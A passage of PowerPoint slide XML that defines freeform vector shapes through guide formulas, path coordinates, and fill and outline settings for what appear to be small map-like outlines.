                  <a:gd name="T87" fmla="*/ 32 h 98"/>
                  <a:gd name="T88" fmla="*/ 283 w 300"/>
                  <a:gd name="T89" fmla="*/ 35 h 98"/>
                  <a:gd name="T90" fmla="*/ 285 w 300"/>
                  <a:gd name="T91" fmla="*/ 44 h 98"/>
                  <a:gd name="T92" fmla="*/ 276 w 300"/>
                  <a:gd name="T93" fmla="*/ 46 h 98"/>
                  <a:gd name="T94" fmla="*/ 267 w 300"/>
                  <a:gd name="T95" fmla="*/ 43 h 98"/>
                  <a:gd name="T96" fmla="*/ 252 w 300"/>
                  <a:gd name="T97" fmla="*/ 42 h 98"/>
                  <a:gd name="T98" fmla="*/ 244 w 300"/>
                  <a:gd name="T99" fmla="*/ 48 h 98"/>
                  <a:gd name="T100" fmla="*/ 243 w 300"/>
                  <a:gd name="T101" fmla="*/ 62 h 98"/>
                  <a:gd name="T102" fmla="*/ 237 w 300"/>
                  <a:gd name="T103" fmla="*/ 72 h 98"/>
                  <a:gd name="T104" fmla="*/ 221 w 300"/>
                  <a:gd name="T105" fmla="*/ 88 h 98"/>
                  <a:gd name="T106" fmla="*/ 213 w 300"/>
                  <a:gd name="T107" fmla="*/ 92 h 98"/>
                  <a:gd name="T108" fmla="*/ 201 w 300"/>
                  <a:gd name="T109" fmla="*/ 87 h 98"/>
                  <a:gd name="T110" fmla="*/ 191 w 300"/>
                  <a:gd name="T111" fmla="*/ 90 h 98"/>
                  <a:gd name="T112" fmla="*/ 181 w 300"/>
                  <a:gd name="T113" fmla="*/ 97 h 98"/>
                  <a:gd name="T114" fmla="*/ 172 w 300"/>
                  <a:gd name="T115" fmla="*/ 95 h 98"/>
                  <a:gd name="T116" fmla="*/ 160 w 300"/>
                  <a:gd name="T117" fmla="*/ 95 h 98"/>
                  <a:gd name="T118" fmla="*/ 149 w 300"/>
                  <a:gd name="T119" fmla="*/ 81 h 98"/>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300"/>
                  <a:gd name="T181" fmla="*/ 0 h 98"/>
                  <a:gd name="T182" fmla="*/ 300 w 300"/>
                  <a:gd name="T183" fmla="*/ 98 h 98"/>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300" h="98">
                    <a:moveTo>
                      <a:pt x="31" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="31" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="12"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="149" y="81"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="149" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="81"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36327" name="Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4328" y="2842"/>
                <a:ext cx="64" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 31 w 64"/>
                  <a:gd name="T1" fmla="*/ 4 h 80"/>
                  <a:gd name="T2" fmla="*/ 31 w 64"/>
                  <a:gd name="T3" fmla="*/ 4 h 80"/>
                  <a:gd name="T4" fmla="*/ 35 w 64"/>
                  <a:gd name="T5" fmla="*/ 5 h 80"/>
                  <a:gd name="T6" fmla="*/ 42 w 64"/>
                  <a:gd name="T7" fmla="*/ 13 h 80"/>
                  <a:gd name="T8" fmla="*/ 47 w 64"/>
                  <a:gd name="T9" fmla="*/ 20 h 80"/>
                  <a:gd name="T10" fmla="*/ 51 w 64"/>
                  <a:gd name="T11" fmla="*/ 25 h 80"/>
                  <a:gd name="T12" fmla="*/ 51 w 64"/>
                  <a:gd name="T13" fmla="*/ 30 h 80"/>
                  <a:gd name="T14" fmla="*/ 51 w 64"/>
                  <a:gd name="T15" fmla="*/ 35 h 80"/>
                  <a:gd name="T16" fmla="*/ 50 w 64"/>
                  <a:gd name="T17" fmla="*/ 41 h 80"/>
                  <a:gd name="T18" fmla="*/ 51 w 64"/>
                  <a:gd name="T19" fmla="*/ 49 h 80"/>
                  <a:gd name="T20" fmla="*/ 50 w 64"/>
                  <a:gd name="T21" fmla="*/ 54 h 80"/>
                  <a:gd name="T22" fmla="*/ 51 w 64"/>
                  <a:gd name="T23" fmla="*/ 57 h 80"/>
                  <a:gd name="T24" fmla="*/ 52 w 64"/>
                  <a:gd name="T25" fmla="*/ 60 h 80"/>
                  <a:gd name="T26" fmla="*/ 56 w 64"/>
                  <a:gd name="T27" fmla="*/ 63 h 80"/>
                  <a:gd name="T28" fmla="*/ 58 w 64"/>
                  <a:gd name="T29" fmla="*/ 67 h 80"/>
                  <a:gd name="T30" fmla="*/ 63 w 64"/>
                  <a:gd name="T31" fmla="*/ 79 h 80"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 80 h 80"/>
                  <a:gd name="T34" fmla="*/ 61 w 64"/>
                  <a:gd name="T35" fmla="*/ 79 h 80"/>
                  <a:gd name="T36" fmla="*/ 55 w 64"/>
                  <a:gd name="T37" fmla="*/ 79 h 80"/>
                  <a:gd name="T38" fmla="*/ 52 w 64"/>
                  <a:gd name="T39" fmla="*/ 80 h 80"/>
                  <a:gd name="T40" fmla="*/ 51 w 64"/>
                  <a:gd name="T41" fmla="*/ 79 h 80"/>
                  <a:gd name="T42" fmla="*/ 47 w 64"/>
                  <a:gd name="T43" fmla="*/ 76 h 80"/>
                  <a:gd name="T44" fmla="*/ 41 w 64"/>
                  <a:gd name="T45" fmla="*/ 72 h 80"/>
                  <a:gd name="T46" fmla="*/ 37 w 64"/>
                  <a:gd name="T47" fmla="*/ 69 h 80"/>
                  <a:gd name="T48" fmla="*/ 28 w 64"/>
                  <a:gd name="T49" fmla="*/ 65 h 80"/>
                  <a:gd name="T50" fmla="*/ 20 w 64"/>
                  <a:gd name="T51" fmla="*/ 59 h 80"/>
                  <a:gd name="T52" fmla="*/ 19 w 64"/>
                  <a:gd name="T53" fmla="*/ 58 h 80"/>
                  <a:gd name="T54" fmla="*/ 18 w 64"/>
                  <a:gd name="T55" fmla="*/ 50 h 80"/>
                  <a:gd name="T56" fmla="*/ 15 w 64"/>
                  <a:gd name="T57" fmla="*/ 46 h 80"/>
                  <a:gd name="T58" fmla="*/ 8 w 64"/>
                  <a:gd name="T59" fmla="*/ 40 h 80"/>
                  <a:gd name="T60" fmla="*/ 7 w 64"/>
                  <a:gd name="T61" fmla="*/ 35 h 80"/>
                  <a:gd name="T62" fmla="*/ 7 w 64"/>
                  <a:gd name="T63" fmla="*/ 31 h 80"/>
                  <a:gd name="T64" fmla="*/ 7 w 64"/>
                  <a:gd name="T65" fmla="*/ 29 h 80"/>
                  <a:gd name="T66" fmla="*/ 7 w 64"/>
                  <a:gd name="T67" fmla="*/ 26 h 80"/>
                  <a:gd name="T68" fmla="*/ 4 w 64"/>
                  <a:gd name="T69" fmla="*/ 22 h 80"/>
                  <a:gd name="T70" fmla="*/ 1 w 64"/>
                  <a:gd name="T71" fmla="*/ 9 h 80"/>
                  <a:gd name="T72" fmla="*/ 0 w 64"/>
                  <a:gd name="T73" fmla="*/ 4 h 80"/>
                  <a:gd name="T74" fmla="*/ 0 w 64"/>
                  <a:gd name="T75" fmla="*/ 1 h 80"/>
                  <a:gd name="T76" fmla="*/ 3 w 64"/>
                  <a:gd name="T77" fmla="*/ 0 h 80"/>
                  <a:gd name="T78" fmla="*/ 8 w 64"/>
                  <a:gd name="T79" fmla="*/ 0 h 80"/>
                  <a:gd name="T80" fmla="*/ 8 w 64"/>
                  <a:gd name="T81" fmla="*/ 3 h 80"/>
                  <a:gd name="T82" fmla="*/ 12 w 64"/>
                  <a:gd name="T83" fmla="*/ 4 h 80"/>
                  <a:gd name="T84" fmla="*/ 13 w 64"/>
                  <a:gd name="T85" fmla="*/ 6 h 80"/>
                  <a:gd name="T86" fmla="*/ 14 w 64"/>
                  <a:gd name="T87" fmla="*/ 7 h 80"/>
                  <a:gd name="T88" fmla="*/ 14 w 64"/>
                  <a:gd name="T89" fmla="*/ 9 h 80"/>
                  <a:gd name="T90" fmla="*/ 13 w 64"/>
                  <a:gd name="T91" fmla="*/ 12 h 80"/>
                  <a:gd name="T92" fmla="*/ 13 w 64"/>
                  <a:gd name="T93" fmla="*/ 13 h 80"/>
                  <a:gd name="T94" fmla="*/ 15 w 64"/>
                  <a:gd name="T95" fmla="*/ 14 h 80"/>
                  <a:gd name="T96" fmla="*/ 17 w 64"/>
                  <a:gd name="T97" fmla="*/ 11 h 80"/>
                  <a:gd name="T98" fmla="*/ 19 w 64"/>
                  <a:gd name="T99" fmla="*/ 9 h 80"/>
                  <a:gd name="T100" fmla="*/ 21 w 64"/>
                  <a:gd name="T101" fmla="*/ 10 h 80"/>
                  <a:gd name="T102" fmla="*/ 21 w 64"/>
                  <a:gd name="T103" fmla="*/ 14 h 80"/>
                  <a:gd name="T104" fmla="*/ 26 w 64"/>
                  <a:gd name="T105" fmla="*/ 13 h 80"/>
                  <a:gd name="T106" fmla="*/ 26 w 64"/>
                  <a:gd name="T107" fmla="*/ 9 h 80"/>
                  <a:gd name="T108" fmla="*/ 30 w 64"/>
                  <a:gd name="T109" fmla="*/ 6 h 80"/>
                  <a:gd name="T110" fmla="*/ 31 w 64"/>
                  <a:gd name="T111" fmla="*/ 4 h 80"/>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64"/>
                  <a:gd name="T169" fmla="*/ 0 h 80"/>
                  <a:gd name="T170" fmla="*/ 64 w 64"/>
                  <a:gd name="T171" fmla="*/ 80 h 80"/>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64" h="80">
                    <a:moveTo>
                      <a:pt x="31" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="31" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36328" name="Freeform 60"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4477" y="2834"/>
                <a:ext cx="151" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 151"/>
                  <a:gd name="T1" fmla="*/ 81 h 98"/>
                  <a:gd name="T2" fmla="*/ 6 w 151"/>
                  <a:gd name="T3" fmla="*/ 85 h 98"/>
                  <a:gd name="T4" fmla="*/ 15 w 151"/>
                  <a:gd name="T5" fmla="*/ 87 h 98"/>
                  <a:gd name="T6" fmla="*/ 23 w 151"/>
                  <a:gd name="T7" fmla="*/ 90 h 98"/>
                  <a:gd name="T8" fmla="*/ 22 w 151"/>
                  <a:gd name="T9" fmla="*/ 86 h 98"/>
                  <a:gd name="T10" fmla="*/ 25 w 151"/>
                  <a:gd name="T11" fmla="*/ 77 h 98"/>
                  <a:gd name="T12" fmla="*/ 33 w 151"/>
